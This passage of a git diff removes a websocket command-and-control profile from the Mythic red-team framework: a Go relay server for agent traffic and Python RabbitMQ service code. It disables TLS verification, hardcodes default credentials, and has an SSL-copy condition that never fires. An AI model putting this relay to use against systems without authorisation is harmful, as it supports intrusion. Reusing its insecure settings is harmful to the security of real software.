- - \ No newline at end of file diff --git a/C2_Profiles/leviathan-websocket/c2_code/server b/C2_Profiles/leviathan-websocket/c2_code/server deleted file mode 100755 index 3b371a7ec..000000000 Binary files a/C2_Profiles/leviathan-websocket/c2_code/server and /dev/null differ diff --git a/C2_Profiles/leviathan-websocket/c2_code/src/build_help b/C2_Profiles/leviathan-websocket/c2_code/src/build_help deleted file mode 100644 index 2e0c93ad7..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/src/build_help +++ /dev/null @@ -1,8 +0,0 @@ -To build the sever: - -go get github.com/gorilla/websocket -go get github.com/kabukky/httpscerts -go build -tags=websocket main.go - -this outputs a binary called "main" -move this to ../server \ No newline at end of file diff --git a/C2_Profiles/leviathan-websocket/c2_code/src/main.go b/C2_Profiles/leviathan-websocket/c2_code/src/main.go deleted file mode 100644 index 315276faa..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/src/main.go +++ /dev/null @@ -1,35 +0,0 @@ -package main - -import ( - "encoding/json" - "io/ioutil" - "log" - "os" - - "./pkg/servers" -) - -var cf *os.File -func main() { - cf, err := os.Open("config.json") - - if err != nil { - log.Println("Error opening config file ", err.Error()) - os.Exit(-1) - } - - config, _ := ioutil.ReadAll(cf) - - c2config := servers.C2Config{} - err = json.Unmarshal(config, &c2config) - if err != nil { - log.Println("Error in unmarshal call for config ", err.Error()) - os.Exit(-1) - } - - // start the server instance with the config - c2server := servers.NewInstance().(servers.Server) - - c2server.Run(c2config) - -} diff --git a/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/server.go b/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/server.go deleted file mode 100644 index 6e7fbc321..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/server.go +++ /dev/null @@ -1,34 +0,0 @@ -package servers - -// C2Config - struct for server configuration -type C2Config struct { - BindAddress string `json:"bindaddress"` - SocketURI string `json:"websocketuri"` - SSLKey string `json:"sslkey"` - SSLCert string `json:"sslcert"` - UseSSL bool `json:"usessl"` - Defaultpage string `json:"defaultpage"` - Logfile string `json:"logfile"` - Debug bool `json:"debug"` -} - -//Server - interface used for all c2 profiles -type Server interface { - ApfellBaseURL() string - SetApfellBaseURL(url string) - PostResponse(taskid string, output []byte) []byte - PostMessage(msg []byte) []byte - GetNextTask(apfellID string) []byte - Run(cf interface{}) -} - -//Message - struct definition for messages between clients and the server -type Message struct { - Tag string `json:"tag"` - Client bool `json:"client"` - Data string `json:"data"` -} - -func NewInstance() interface{} { - return newServer() -} diff --git a/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/websocket.go b/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/websocket.go deleted file mode 100644 index 09abbf8e5..000000000 --- a/C2_Profiles/leviathan-websocket/c2_code/src/pkg/servers/websocket.go +++ /dev/null @@ -1,298 +0,0 @@ -// +build websocket - -package servers - -import ( - "bytes" - "crypto/tls" - "fmt" - "io/ioutil" - "log" - "net/http" - "os" - "strings" - - "github.com/gorilla/websocket" - "github.com/kabukky/httpscerts" -) - -type WebsocketC2 struct { - BaseURL string - BindAddress string - SSL bool - SocketURI string - Defaultpage string - Logfile string - Debug bool -} - -var upgrader = websocket.Upgrader{} - 
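[Editorial aside, not part of the diff: the deleted websocket.go above declares a package-level gorilla/websocket Upgrader that the SocketHandler and manageClient functions below configure and use. A minimal, self-contained sketch of that pattern follows for reference. The 0.0.0.0:8081 bind address and "socket" URI mirror the defaults in the deleted config.json, while the echo behavior (instead of forwarding agent messages to Mythic) is a simplification for illustration only.]

package main

import (
	"log"
	"net/http"

	"github.com/gorilla/websocket"
)

// sketchUpgrader mirrors the deleted profile's package-level Upgrader.
// CheckOrigin returning true accepts the handshake regardless of the Origin header.
var sketchUpgrader = websocket.Upgrader{
	CheckOrigin: func(r *http.Request) bool { return true },
}

// echoSocket upgrades the HTTP request to a websocket and echoes JSON messages back,
// standing in for the read/reply loop that manageClient implements in the deleted file.
func echoSocket(w http.ResponseWriter, r *http.Request) {
	conn, err := sketchUpgrader.Upgrade(w, r, nil)
	if err != nil {
		log.Println("websocket upgrade failed:", err)
		return
	}
	defer conn.Close()
	for {
		var msg map[string]interface{}
		if err := conn.ReadJSON(&msg); err != nil {
			log.Println("read error, closing session:", err)
			return
		}
		if err := conn.WriteJSON(msg); err != nil {
			log.Println("write error, closing session:", err)
			return
		}
	}
}

func main() {
	// "/socket" stands in for the configurable websocketuri from the deleted config.json.
	http.HandleFunc("/socket", echoSocket)
	log.Fatal(http.ListenAndServe("0.0.0.0:8081", nil))
}

[End of editorial aside; the diff of the deleted websocket.go continues below.]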
-func newServer() Server { - return &WebsocketC2{} -} - -func (s *WebsocketC2) SetBindAddress(addr string) { - s.BindAddress = addr -} - -//ApfellBaseURL - Returns the base url for apfell -func (s WebsocketC2) ApfellBaseURL() string { - return s.BaseURL -} - -//SetApfellBaseURL - Sets the base url for apfell -func (s *WebsocketC2) SetApfellBaseURL(url string) { - s.BaseURL = url -} - -//SetSocketURI - Set socket uri -func (s *WebsocketC2) SetSocketURI(uri string) { - s.SocketURI = uri -} - -func (s *WebsocketC2) PostMessage(msg []byte) []byte { - return s.htmlPostData("", msg) -} - -func (s WebsocketC2) GetNextTask(apfellID string) []byte { - //place holder - //url := fmt.Sprintf("%sapi/v%s/agent_message", s.ApfellBaseURL(), ApiVersion) - return make([]byte, 0) -} - -func (s WebsocketC2) PostResponse(taskid string, output []byte) []byte { - //urlEnding := fmt.Sprintf("api/v%s/agent_message", ApiVersion) - return output -} - -//postRESTResponse - Wrapper to post task responses through the Apfell rest API -func (s *WebsocketC2) postRESTResponse(urlEnding string, data []byte) []byte { - return make([]byte, 0) -} - -//htmlPostData HTTP POST function -func (s *WebsocketC2) htmlPostData(urlEnding string, sendData []byte) []byte { - url := s.ApfellBaseURL() - //log.Println("Sending POST request to url: ", url) - s.Websocketlog(fmt.Sprintln("Sending POST request to: ", url)) - - req, _ := http.NewRequest("POST", url, bytes.NewBuffer(sendData)) - contentLength := len(sendData) - req.ContentLength = int64(contentLength) - tr := &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - } - client := &http.Client{Transport: tr} - resp, err := client.Do(req) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error sending POST request: %s", err.Error())) - return make([]byte, 0) - } - - if resp.StatusCode != 200 { - s.Websocketlog(fmt.Sprintf("Did not receive 200 response code: %d", resp.StatusCode)) - return make([]byte, 0) - } - - defer resp.Body.Close() - - body, err := ioutil.ReadAll(resp.Body) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error reading response body: %s", err.Error())) - return make([]byte, 0) - } - - return body -} - -//htmlGetData - HTTP GET request for data -func (s *WebsocketC2) htmlGetData(url string) []byte { - //log.Println("Sending HTML GET request to url: ", url) - tr := &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - } - client := &http.Client{Transport: tr} - var respBody []byte - - req, err := http.NewRequest("GET", url, nil) - if err != nil { - s.Websocketlog(fmt.Sprintf("Error creating http request: %s", err.Error())) - return make([]byte, 0) - } - - resp, err := client.Do(req) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error completing GET request: %s", err.Error())) - return make([]byte, 0) - } - - if resp.StatusCode != 200 { - s.Websocketlog(fmt.Sprintf("Did not receive 200 response code: %d", resp.StatusCode)) - return make([]byte, 0) - } - - defer resp.Body.Close() - - respBody, _ = ioutil.ReadAll(resp.Body) - - return respBody - -} - -func (s *WebsocketC2) SetDebug(debug bool) { - s.Debug = debug -} - -//GetDefaultPage - Get the default html page -func (s WebsocketC2) GetDefaultPage() string { - return s.Defaultpage -} - -//SetDefaultPage - Set the default html page -func (s *WebsocketC2) SetDefaultPage(newpage string) { - s.Defaultpage = newpage -} - -//SocketHandler - Websockets handler -func (s WebsocketC2) SocketHandler(w http.ResponseWriter, r *http.Request) { - //Upgrade the websocket connection - 
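// Editor's note (not part of the deleted file): the next two deleted statements set
// CheckOrigin to always return true, so the handshake is accepted from any Origin,
// and then call Upgrade to switch the HTTP connection over to the websocket protocol.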
upgrader.CheckOrigin = func(r *http.Request) bool { return true } - conn, err := upgrader.Upgrade(w, r, nil) - if err != nil { - s.Websocketlog(fmt.Sprintf("Websocket upgrade failed: %s\n", err.Error())) - http.Error(w, "websocket connection failed", http.StatusBadRequest) - return - } - - s.Websocketlog("Received new websocket client") - - go s.manageClient(conn) - -} - -func (s *WebsocketC2) manageClient(c *websocket.Conn) { - -LOOP: - for { - // Wait for the client to send the initial checkin message - m := Message{} - err := c.ReadJSON(&m) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Read error %s. Exiting session", err.Error())) - return - } - - var resp []byte - if m.Client { - s.Websocketlog(fmt.Sprintf("Received agent message %+v\n", m)) - resp = s.PostMessage([]byte(m.Data)) - } - - reply := Message{Client: false} - - if len(resp) == 0 { - reply.Data = string(make([]byte, 1)) - } else { - reply.Data = string(resp) - } - - reply.Tag = m.Tag - - if err = c.WriteJSON(reply); err != nil { - s.Websocketlog(fmt.Sprintf("Error writing json to client %s", err.Error())) - break LOOP - } - - } - - c.Close() - -} - -//ServeDefaultPage - HTTP handler -func (s WebsocketC2) ServeDefaultPage(w http.ResponseWriter, r *http.Request) { - log.Println("Received request: ", r.URL) - log.Println("URI Path ", r.URL.Path) - if (r.URL.Path == "/" || r.URL.Path == "/index.html") && r.Method == "GET" { - // Serve the default page if we receive a GET request at the base URI - http.ServeFile(w, r, s.GetDefaultPage()) - } - - http.Error(w, "Not Found", http.StatusNotFound) - return -} -//Run - main function for the websocket profile -func (s WebsocketC2) Run(config interface{}) { - cf := config.(C2Config) - s.Debug = cf.Debug - s.SetDefaultPage(cf.Defaultpage) - s.SetApfellBaseURL(os.Getenv("MYTHIC_ADDRESS")) - s.SetBindAddress(cf.BindAddress) - s.SetSocketURI(cf.SocketURI) - - // Handle requests to the base uri - http.HandleFunc("/", s.ServeDefaultPage) - // Handle requests to the websockets uri - http.HandleFunc(fmt.Sprintf("/%s", s.SocketURI), s.SocketHandler) - - // Setup all of the options according to the configuration - if !strings.Contains(cf.SSLKey, "") && !strings.Contains(cf.SSLCert, "") { - - // copy the key and cert to the local directory - keyfile, err := ioutil.ReadFile(cf.SSLKey) - if err != nil { - log.Println("Unable to read key file ", err.Error()) - } - - err = ioutil.WriteFile("key.pem", keyfile, 0644) - if err != nil { - log.Println("Unable to write key file ", err.Error()) - } - - certfile, err := ioutil.ReadFile(cf.SSLCert) - if err != nil { - log.Println("Unable to read cert file ", err.Error()) - } - - err = ioutil.WriteFile("cert.pem", certfile, 0644) - if err != nil { - log.Println("Unable to write cert file ", err.Error()) - } - } - - if cf.UseSSL { - err := httpscerts.Check("cert.pem", "key.pem") - if err != nil { - s.Websocketlog(fmt.Sprintf("Error for cert.pem or key.pem %s", err.Error())) - err = httpscerts.Generate("cert.pem", "key.pem", cf.BindAddress) - if err != nil { - log.Fatal("Error generating https cert") - os.Exit(1) - } - } - - s.Websocketlog(fmt.Sprintf("Starting SSL server at https://%s and wss://%s", cf.BindAddress, cf.BindAddress)) - err = http.ListenAndServeTLS(cf.BindAddress, "cert.pem", "key.pem", nil) - if err != nil { - log.Fatal("Failed to start raven server: ", err) - } - } else { - s.Websocketlog(fmt.Sprintf("Starting server at http://%s and ws://%s", cf.BindAddress, cf.BindAddress)) - err := http.ListenAndServe(cf.BindAddress, nil) - if err != nil { 
- log.Fatal("Failed to start raven server: ", err) - } - } -} - -//Websocketlog - logging function -func (s WebsocketC2) Websocketlog(msg string) { - if s.Debug { - log.Println(msg) - } -} diff --git a/C2_Profiles/leviathan-websocket/mythic/C2ProfileBase.py b/C2_Profiles/leviathan-websocket/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/C2_Profiles/leviathan-websocket/mythic/MythicBaseRPC.py b/C2_Profiles/leviathan-websocket/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum 
import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/C2_Profiles/leviathan-websocket/mythic/MythicCallbackRPC.py b/C2_Profiles/leviathan-websocket/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = 
await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/C2_Profiles/leviathan-websocket/mythic/__init__.py b/C2_Profiles/leviathan-websocket/mythic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/C2_Profiles/leviathan-websocket/mythic/c2_functions/C2_RPC_functions.py b/C2_Profiles/leviathan-websocket/mythic/c2_functions/C2_RPC_functions.py deleted file mode 100644 index 6332e7fc2..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/c2_functions/C2_RPC_functions.py +++ /dev/null @@ -1,11 +0,0 @@ -from C2ProfileBase import * -import MythicCallbackRPC - -# request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} -# must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message -async def test(request): - response = RPCResponse() - response.status = RPCStatus.Success - response.response = "hello" - #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response \ No newline at end of file diff --git a/C2_Profiles/leviathan-websocket/mythic/c2_functions/__init__.py b/C2_Profiles/leviathan-websocket/mythic/c2_functions/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/C2_Profiles/leviathan-websocket/mythic/c2_functions/websocket.py b/C2_Profiles/leviathan-websocket/mythic/c2_functions/websocket.py deleted file mode 100644 index 4bf28c8c6..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/c2_functions/websocket.py +++ /dev/null @@ -1,38 +0,0 @@ -from C2ProfileBase 
import * - - -class Websocket(C2Profile): - name = "leviathan-websocket" - description = "Websocket C2 Server for Leviathan" - author = "@xorrior" - is_p2p = False - is_server_routed = False - mythic_encrypts = True - parameters = [ - C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="ws://127.0.0.1", - verifier_regex="^(ws|wss)://[a-zA-Z0-9]+", - ), - C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="ENDPOINT_REPLACE", - description="Websockets Endpoint", - default_value="socket", - required=False, - ), - C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="8081", - verifier_regex="^[0-9]+$", - required=False, - ), - ] diff --git a/C2_Profiles/leviathan-websocket/mythic/c2_service.sh b/C2_Profiles/leviathan-websocket/mythic/c2_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/c2_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/C2_Profiles/leviathan-websocket/mythic/mythic_service.py b/C2_Profiles/leviathan-websocket/mythic/mythic_service.py deleted file mode 100755 index dde56b77c..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/mythic_service.py +++ /dev/null @@ -1,410 +0,0 @@ -#!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." 
+ pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - 
file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! 
" + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except 
